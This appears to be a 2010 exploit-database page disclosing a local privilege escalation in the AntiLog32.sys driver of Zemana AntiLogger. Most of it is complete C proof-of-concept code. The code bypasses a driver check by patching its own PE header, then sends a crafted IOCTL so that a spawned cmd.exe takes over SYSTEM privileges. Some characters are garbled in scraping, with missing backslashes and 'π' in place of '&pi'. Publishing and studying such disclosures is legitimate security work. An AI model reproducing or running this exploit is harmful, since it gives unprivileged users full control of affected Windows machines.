Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation Vulnerability
# Published : 2010-07-28
# Author : th_decoder
# Previous Title : QQPlayer smi File Buffer Overflow Exploit
# Next Title : WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)

Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation Vulnerability

VULNERABLE PRODUCTS 
Zemana AntiLogger <=1.9.2.2.206

DETAILS:
AntiLog32.sys create a device called DeviceAntiLog32 , and handles DeviceIoControl request IoControlCode = 0x8000201C , which  can elevate the privilege of a process to another process

EXPLOIT CODE:

#include "stdafx.h"
#include "windows.h"
#include "winioctl.h"
#define IOCTL_IMPERSONATE_PROCESS CTL_CODE(0x8000 , 0x807 , METHOD_BUFFERED , FILE_ANY_ACCESS)

typedef struct _IMPERSONATE_PROCESS{
	HANDLE ImpersonateProcess ; 
	HANDLE SystemProcess ; 
}IMPERSONATE_PROCESS , *PIMPERSONATE_PROCESS;

int main(int argc, char* argv[])
{
	printf("Zemana AntiLogger <=1.9.2.2.206 AntiLog32.sys <= 1.5.2.755n"
		"Local Privilege Escalation Vulnerability Proof-of-Conceptn"
		"2010-7-28n"
		"By MJ0011 th_decoder@126.comnnPress Entern");
	getchar();
	
	//bypass some useless create check 

	PIMAGE_DOS_HEADER pdoshdr = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);
	PIMAGE_NT_HEADERS pnthdr = (PIMAGE_NT_HEADERS)((ULONG)pdoshdr + pdoshdr->e_lfanew);
	PVOID waddr = &pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress ;
	
	ULONG oldp ; 

	VirtualProtect(waddr , sizeof(ULONG) , PAGE_READWRITE , &oldp);
	pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0x1 ; 
	VirtualProtect(waddr , sizeof(ULONG) , oldp , &oldp);


	HANDLE hdev = CreateFile("\\.\AntiLog32" , 
		FILE_READ_ATTRIBUTES , 
		FILE_SHARE_READ , 
		0,
		OPEN_EXISTING , 
		0,0);

	if (hdev == INVALID_HANDLE_VALUE)
	{
		printf("cannot open device %un" , GetLastError());
		getchar();
		return 0; 

	}

	STARTUPINFOA sia ; 
	memset(&sia , 0 , sizeof(sia));
	sia.cb = sizeof(sia);
	PROCESS_INFORMATION pi ; 
	memset(π , 0 , sizeof(pi));

	

	if (!CreateProcess("c:\windows\system32\cmd.exe" , 
		NULL , 
		NULL,
		NULL,
		FALSE , 
		CREATE_SUSPENDED,
		NULL,
		NULL,
		&sia , 
		π))
	{
		printf("cannot run cmd.exe....%un", GetLastError());
		getchar();
		return 0 ; 
	}

	
	IMPERSONATE_PROCESS ip ; 
	ip.ImpersonateProcess = (HANDLE)pi.dwProcessId ; 
	ip.SystemProcess = (HANDLE)4 ; //// WinXP and later
	ULONG btr ; 

	if (!DeviceIoControl(hdev , IOCTL_IMPERSONATE_PROCESS , &ip , sizeof(ip) , NULL , 0 , &btr, 0))
	{
		printf("cannot impersonate process %un" , GetLastError());
		getchar();
		return 0 ; 
	}

	ResumeThread(pi.hThread);

	printf("OKn");

	
	return 0;
}

================================




th_decoder
2010-07-28